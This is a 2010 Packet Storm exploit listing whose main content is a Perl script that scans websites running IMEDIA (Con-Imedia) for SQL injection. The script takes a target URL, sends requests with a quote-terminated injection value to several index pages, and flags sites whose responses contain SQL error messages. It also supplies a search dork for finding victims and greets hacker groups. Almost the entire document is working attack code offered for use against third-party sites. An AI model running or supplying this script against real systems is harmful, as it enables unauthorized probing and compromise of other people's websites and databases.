IMEDIA SQL Injection

2010-05-20T00:00:00
ID PACKETSTORM:89726
Type packetstorm
Reporter kannibal615
Modified 2010-05-20T00:00:00

Description

                                        
                                            `# Exploit Titre: IMEDIA (index.php) SQL Injection Vulnerability  
# Date: 19-05-2010  
# Auteur: Kannibal615  
# Link Software: N/A  
# Version: N/A  
# Testé sur: ALL  
# CVE: N/A  
# Code:   
  
# DORK : Powered by: Con-Imedia  
  
  
#!usr/bin/perl -w  
  
use HTTP::Request;  
use LWP::UserAgent;  
  
system ("cls");  
print "\n";  
print " @@ @@ @@@@@@ @@ @@ @@@@ @@@@@@@ @@ @@ @@@@@@@ @@@@@\n";  
print " @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@\n";  
print " @@ @@ @@ @@@ @@@@@@@@ @@ @@ @@ @@@@ @@@@@@ @@ @@\n";  
print " @@ @@ @@ @@@ @@@@@@@@ @@@@@@@@ @@ @@ @@ @@@@@@ @@ @@\n";  
print " @@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@\n";  
print " @@ @@@@@@ @@ @@ @@ @@ @@@@@@@ @@ @@ @@@@@@@ @@ @@\n\n";  
print " LA ILAH ILLA ALLAH MOUHAMED RASOUL ALLAH\n\n";  
print "\n\n";  
print "[*]Coded By: Kannibal615 > Tunisian Genius Security > zn[at]live[dot]de\n\n";  
print "[*]Greetz 1: My Best Friend AYMEN > THE P!RATOR\n";  
print '[*]Greetz 2: Pc-InseCt/alghaking/emptyzero/V!Ru$_T4ckJ3n';  
print "\n[*]Greetz 3: To All VBHACKER.NET Members\n";  
print "[*]Dork : Powered by: Con-Imedia\n";  
print "[*]Usage : k615>[target here]\n";  
print "[*]Exemple : k615> www.target.com\n";  
print "\n";  
print "k615>";  
  
$input=<>;  
chomp $input;  
  
if ( $input !~ /^http:/ ) {  
$input = 'http://' . $input;  
}  
if ( $input !~ /\/$/ ) {  
$input = $input . '/';  
}  
  
  
@path=('index1.php?linkid=999.9"','index1.php?sublinkid=999.9"','index1.php?linkid=&sublink=999.9"',  
'index2.php?linkid=999.9"','index3.php?day=999.9"');  
  
foreach $ways(@path){  
  
$final=$input.$ways;  
  
my $req=HTTP::Request->new(GET=>$final);  
my $ua=LWP::UserAgent->new();  
$ua->timeout(30);  
my $response=$ua->request($req);  
  
if($response->content =~ /sql/ ||  
$response->content =~ /SQL error/ ||  
$response->content =~ /SQL/ ||  
$response->content =~ /syntax/ ||  
$response->content =~ /Invalid query/ ||  
$response->content =~ /your SQL/ ||  
$response->content =~ /MySQL/ ||  
$response->content =~ /at line 1/ ||  
$response->content =~ /MySQL server/ ||  
$response->content =~ /version for/ ||  
$response->content =~ /Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near/ ||  
$response->content =~ /fetch/  
){  
print "[+] Vulnerable -> $final\n";  
}  
else{  
print "[-] Not Vulner <- $final\n";  
}  
}  
print "\n\nSOBHAN ALLAH\n";  
print "press enter to exit";  
$enter=<>;  
  
  
  
  
#db-exploit 19-05-2010  
#Coded By Kannibal615  
#Tunisian Genius Security  
`